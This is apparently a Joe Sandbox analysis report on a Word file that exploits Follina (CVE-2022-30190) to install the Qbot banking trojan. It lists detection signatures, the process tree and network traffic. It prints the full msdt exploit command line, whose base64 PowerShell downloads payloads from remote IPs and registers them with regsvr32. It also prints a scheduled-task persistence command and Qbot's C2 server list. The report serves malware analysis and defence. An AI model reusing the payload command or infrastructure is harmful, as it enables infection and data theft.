Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name:doc782.docx
Analysis ID:640879
MD5:e7015438268464cedad98b1544d643ad
SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
Tags:CVE-2022-30190docFollinaObama186QbotTA570
Infos:

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 2344 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 4584 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 3108 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 6524 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 6676 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jsmb0bcn\jsmb0bcn.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 1924 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrcfnpcx\hrcfnpcx.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 2108 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 5316 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • schtasks.exe (PID: 408 cmdline: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 5968 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 6384 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • regsvr32.exe (PID: 2312 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 5836 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • csc.exe (PID: 5892 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0x1gvsr0\0x1gvsr0.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 3232 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 4400 cmdline: regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t.A" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4420 cmdline: -s "C:\Users\user\AppData\Local\Temp\t.A" MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x1447:$re1: location.href = "ms-msdt:
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000001B.00000002.496074932.0000000005340000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
          0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
            0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
              0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
                0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
                  Click to see the 22 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  41.2.regsvr32.exe.3420000.2.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                    28.2.regsvr32.exe.5b60184.2.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                      41.2.regsvr32.exe.33f0184.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                        33.0.explorer.exe.7a0000.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                          28.2.regsvr32.exe.2c30000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                            Click to see the 31 entries

                            Sigma Signatures

                            Persistence and Installation Behavior

                            barindex
                            Sigma detected: Schedule system process
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59, CommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 5316, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn znkplrgo /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t.A\"" /SC ONCE /Z /ST 18:47 /ET 18:59, ProcessId: 408, ProcessName: schtasks.exe

                            Snort Signatures

                            Timestamp:185.234.247.119192.168.2.2280491732036726 06/07/22-18:38:14.250872
                            SID:2036726
                            Source Port:80
                            Destination Port:49173
                            Protocol:TCP
                            Classtype:Attempted User Privilege Gain

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Multi AV Scanner detection for submitted file
                            Source: doc782.docxVirustotal: Detection: 23%Perma Link
                            Source: doc782.docxReversingLabs: Detection: 17%
                            Source: 36.0.explorer.exe.c30000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222",

                            Exploits

                            barindex
                            Yara detected Microsoft Office Exploit Follina CVE-2022-30190
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm, type: DROPPED
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                            Source: Binary string: amstream.pdb source: explorer.exe, 00000021.00000003.495697141.0000000004B92000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.496818765.0000000005602000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.501625478.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000021.00000003.495697141.0000000004B92000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.496818765.0000000005602000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.501625478.0000000004E93000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EBCFC FindFirstFileW,FindNextFileW,26_2_049EBCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0536BCFC FindFirstFileW,FindNextFileW,27_2_0536BCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_05B9BCFC FindFirstFileW,FindNextFileW,28_2_05B9BCFC
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007ABCFC FindFirstFileW,FindNextFileW,33_2_007ABCFC

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
                            Source: global trafficTCP traffic: 192.168.2.4:49752 -> 185.234.247.119:80
                            Source: global trafficTCP traffic: 192.168.2.4:49758 -> 185.234.247.119:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49173
                            Source: Joe Sandbox ViewASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 07 Jun 2022 16:45:11 GMTContent-Type: application/octet-streamContent-Length: 1437696Connection: keep-aliveAccept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment;Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /1676044147.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
